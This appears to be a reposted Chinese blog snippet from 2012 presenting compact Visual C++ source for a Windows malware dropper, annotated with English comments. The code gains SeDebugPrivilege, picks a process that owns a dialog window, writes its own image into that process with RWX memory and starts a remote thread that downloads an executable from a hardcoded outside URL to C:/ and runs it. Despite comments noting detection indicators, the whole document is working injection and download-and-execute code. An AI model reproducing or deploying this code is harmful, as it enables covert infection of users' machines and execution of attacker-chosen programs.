VC++1.5K字节实现下载并远程注入

来源:岁月联盟 编辑:exp 时间:2012-08-16
#pragma comment(linker,"/BASE:0x13140000 /ENTRY:InjectPro /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078")     
#pragma comment(lib, "urlmon.lib")     
#include <windows.h>     
    
// Body of the thread that InjectPro (below) starts inside the target process:
// fetches a file from the hardcoded URL into a fixed path on C:\ and launches
// it, then ends the thread. Both strings are literals, so the URL, the drop
// path and the urlmon import are stable indicators a defender can key on.
// None of the three calls' results are checked.
void InjectMemo()

{
    URLDownloadToFile(0, "http://www.fi7ke.com/upiea.exe", TEXT("C:/upiea.exe"), 0, 0);    // download to the fixed path; HRESULT ignored
    WinExec("c:/upiea.exe", SW_SHOW);    // run the dropped file with a visible window
    ExitThread(0);    // terminate this (remote) thread; does not return
}
    
// Enables SeDebugPrivilege on the current process token so that the later
// OpenProcess(PROCESS_ALL_ACCESS, ...) on another process can succeed.
// This only takes effect if the token already holds the privilege (an
// elevated token); AdjustTokenPrivileges' result is not checked, and the
// token handle is never closed. A privilege-enable on SeDebugPrivilege is
// a common audit signal that precedes cross-process access.
void GetDebugPrivs()
{
    HANDLE hToken;
    DWORD ReGvl;    // receives the size of the previous-state buffer (none is supplied)
    TOKEN_PRIVILEGES Ttges;    // only Privileges[0] is filled in

    if (OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
    {
        // LUID lookup result is unchecked; on failure Luid is left uninitialized.
        LookupPrivilegeValue(NULL, "SeDebugPrivilege", &Ttges.Privileges[0].Luid);
        Ttges.PrivilegeCount=1;
        Ttges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges(hToken, FALSE, &Ttges, 0,(PTOKEN_PRIVILEGES)NULL, &ReGvl);
    }
}
    
// Program entry point (selected by /ENTRY in the linker pragma at the top of
// the file). Copies this executable's own in-memory image into another
// process at the same base address and starts InjectMemo there as a new
// thread. No API result is checked anywhere in this function, so a failed
// OpenProcess or allocation simply leads to the later calls failing silently.
void InjectPro()
{
    DWORD Size,PID;
    PBYTE module;
    module = (PBYTE)GetModuleHandle(0);    // base address of this image in our own process
    // Image size taken from the PE optional header; used as the copy length below.
    Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage;
    HANDLE ProcessHandle;
    LPVOID heart;    // where the image lands in the target (expected to equal module)
    GetDebugPrivs();
    // Target selection: the first top-level window of class "#32770" (the
    // standard dialog class), i.e. whichever process happens to own a dialog.
    GetWindowThreadProcessId(FindWindow("#32770", NULL), &PID);
    ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);    // NULL on failure; not checked
    // Release whatever the target has at our base address, then reserve the
    // same range there with RWX protection: the copied image then needs no
    // relocation. The unusual /BASE in the linker pragma presumably exists to
    // make a collision at that address in the target unlikely.
    VirtualFreeEx(ProcessHandle, module, 0, MEM_RELEASE);
    heart = VirtualAllocEx(ProcessHandle, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(ProcessHandle, heart, module, Size, NULL);    // copy the whole image verbatim
    // InjectMemo's address is only valid in the target because the image was
    // placed at the same base; the thread parameter (module) is unused by it.
    CreateRemoteThread(ProcessHandle, 0, 0, (LPTHREAD_START_ROUTINE)InjectMemo, module, 0, NULL);
}
作者:yincheng01